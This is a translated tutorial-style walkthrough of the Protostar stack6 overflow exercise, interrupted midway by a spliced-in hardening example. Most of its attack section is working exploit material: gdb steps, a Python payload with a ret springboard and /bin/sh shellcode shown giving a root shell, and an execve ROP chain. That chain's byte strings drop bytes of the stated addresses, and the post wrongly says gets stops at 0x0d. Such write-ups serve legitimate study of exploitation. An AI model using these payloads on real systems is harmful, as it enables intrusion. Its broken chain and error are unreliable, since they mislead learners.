Stack Overflow attacks using ROP in Linux

Source: Internet
Author: User

Protostar stack6 is used to demonstrate a simple use of ROP in Linux. ROP, Return Oriented Programming, was called ret2libc in its early form. For an introduction to ROP see the earlier article 《CVE2012-1889 Exploit writing (III)》; the idea is the same, only the platform is now Linux.

0x01. The __builtin_return_address function

First, the __builtin_return_address function. It takes one argument, which can be 0, 1, 2, and so on. __builtin_return_address(0) returns the return address of the current function; each increment of the argument obtains the return address one frame further up the call chain. Windows seems to have a similar function, but I have forgotten its name. The following example shows what this function is useful for:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void bar(void);   /* prototype added: foo() calls bar() before it is defined */

void foo(void)
{
    printf("in foo()\n");
    /* %p is the correct specifier for the pointer the built-in returns */
    printf("Foo: __builtin_return_address(0) = %p\n", __builtin_return_address(0));
    printf("Foo: __builtin_return_address(1) = %p\n", __builtin_return_address(1));
    bar();
}

void bar(void)
{
    printf("in bar()\n");
    printf("Bar: __builtin_return_address(0) = %p\n", __builtin_return_address(0));
    printf("Bar: __builtin_return_address(1) = %p\n", __builtin_return_address(1));
}

int main(int argc, char **argv)
{
    foo();
    return 0;
}


Compile it and step through it with gdb, as shown in the following figure: calling __builtin_return_address(1) inside foo obtains the address that main will return to once it finishes.

0x02. Executing shellcode directly on the stack

The source code of the challenge is as follows:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath(void)
{
    char buffer[64];
    unsigned int ret;

    printf("input path please: "); fflush(stdout);

    gets(buffer);          /* unbounded read: this is the overflow */

    /* cast added so the pointer-to-integer assignment compiles cleanly */
    ret = (unsigned int)__builtin_return_address(0);

    if ((ret & 0xbf000000) == 0xbf000000) {
        printf("bzzzt (%p)\n", (void *)ret);
        _exit(1);
    }

    printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
    getpath();
}

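The getpath() above pairs a return-address filter with an unbounded gets(). As an added example that is not part of the original post, the C below implements that filter as a standalone predicate, so you can see which addresses it accepts and rejects, beside a bounded replacement for the read that removes the overflow; the function names and PATH_BUF are my own choices.

```c
/* Added example, not from the original post: the stack6 return-address
 * filter as a predicate, beside a bounded replacement for gets(). */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define PATH_BUF 64   /* same buffer size as stack6 */
/* The check from stack6: it rejects only return addresses whose top byte
 * is 0xBF (the stack). An address inside the binary's .text, such as the
 * final ret of main, passes, so the filter alone is not a mitigation. */
int stack6_ret_check_passes(uint32_t ret)
{
    return (ret & 0xbf000000u) != 0xbf000000u;
}

/* Bounded replacement for gets(): reads one line into dst (at most
 * dstlen-1 bytes), always NUL-terminates and strips the newline.
 * Returns 1 if the whole line fit, 0 if it was truncated (the rest of
 * the line is drained so the next read starts clean), -1 on EOF. */
int read_path_line(FILE *in, char *dst, size_t dstlen)
{
    if (fgets(dst, (int)dstlen, in) == NULL)
        return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return 1;
    }
    /* No newline seen: either the line was too long or the input ended
     * without one. Drain up to the newline and report whether any bytes
     * were dropped. */
    int c, dropped = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped = 1;
    return dropped ? 0 : 1;
}

/* Hardened getpath(): with the overflow gone, the saved return address
 * cannot be overwritten, so no address filter is needed. */
int getpath_safe(FILE *in)
{
    char buffer[PATH_BUF];
    int rc = read_path_line(in, buffer, sizeof buffer);
    if (rc == 1)
        printf("got path %s\n", buffer);
    else if (rc == 0)
        printf("path too long (max %zu bytes)\n", sizeof buffer - 1);
    return rc;
}
```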
The buffer can clearly be overflowed, but the return address is checked: its top byte must not be 0xBF, and stack addresses have a top byte of 0xBF, so we cannot jump straight to the stack to execute shellcode. We can, however, use a ret instruction in .text as a springboard. First, confirm where in the input the overwritten return address lies:

python -c "print 'A' * 80 + 'B' * 4" > data.txt
gdb stack6
disas getpath
b *0x080484b8    # here the return address is loaded into eax
r < data.txt
info registers eax

eax is 0x42424242, i.e. the return address has been overwritten with 0x42424242. Now we need a ret instruction, and the last instruction of main will do: disas main shows its address is 0x08048508. If we overwrite the return address with 0x08048508, that address is executed after getpath returns, and since it is itself a ret, the next word on the stack is used as another return address, so we can place the shellcode address there. Next we need the buffer address. Break at the gets call:

disas getpath
b *0x080484aa    # call gets
info registers eax

which gives the buffer address 0xBFFFFCCC. With the start of the buffer known, the shellcode location follows: 0xBFFFFCCC + 80 + 4 + 4 = 0xBFFFFD24. The following figure shows the data layout. Generate this data with Python and use it as the input of the stack6 program:

python -c "print 'A' * 80 + '\x08\x85\x04\x08' + '\x24\xFD\xFF\xBF' + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > data.txt
gdb stack6
r < data.txt
whoami
root

0x03. Redirecting to the last ret of main with ROP

The method above, redirecting execution to the final ret instruction of main, already uses the idea of ROP.
However, if the stack is not executable, that method will not work. We can instead call execve("/bin/sh", 0, 0) to execute a shell. To do that we first need the address of execve. In gdb:

print execve    # 0xb7f2e170
print exit      # 0xb7ec60c0

Then search for a /bin/sh string with x/1000s $esp: the string "SHELL=/bin/bash" is found at 0xbffffefb, so the address we need is 0xbffffefb + 6 = 0xBFFFFF01. You could also supply the string directly in the input, but then you must control the string terminator, and gets cannot read it (it stops at 0x0d, not 0x00), which makes the extra handling troublesome. The search above finds the environment variable string in the process. In the same way we can find a pointer to 0x00000000, for example 0xbffffd6a, and pass that pointer as the second and third arguments of execve. The data layout is as follows:


Once execve is called it does not return, so the slot filled with the exit address could also hold any other data that contains no NUL byte. I think that can be dealt with later.

python -c "print 'A' * 80 + '\x08\x85\x04\x08' + '\xE1\xF2\xB7' + '\xC0\x60\xEC\xB7' + '\x01\xFF\xBF' + '\x6A\xFD\xFF\xBF' + '\x6A\xFD\xFF\xBF'" > data.txt
gdb stack6
r < data.txt

In gdb, however, we can see that /bin/bash exits immediately after it is started. I suspect this is a mistake in how execve is being used; the ROP idea itself is correct. Next time we will analyze the shellcode from the first method, and then you will know how to use it.

0x04. gdb debugging notes

Disassemble a specified region: disas /r 0x0804a000 0x0804b000
View a function address: print execve
Modify memory: set *(char *)0x0804aabb = 0x00 (choose the cast type to match the data)
Use a file as the program's input: run < file-path
Use shell command output as the command-line argument: run $(python -c "print 'a' * 100")

Source URL: http://www.programlife.net/linux-rop-stack-overflow.html
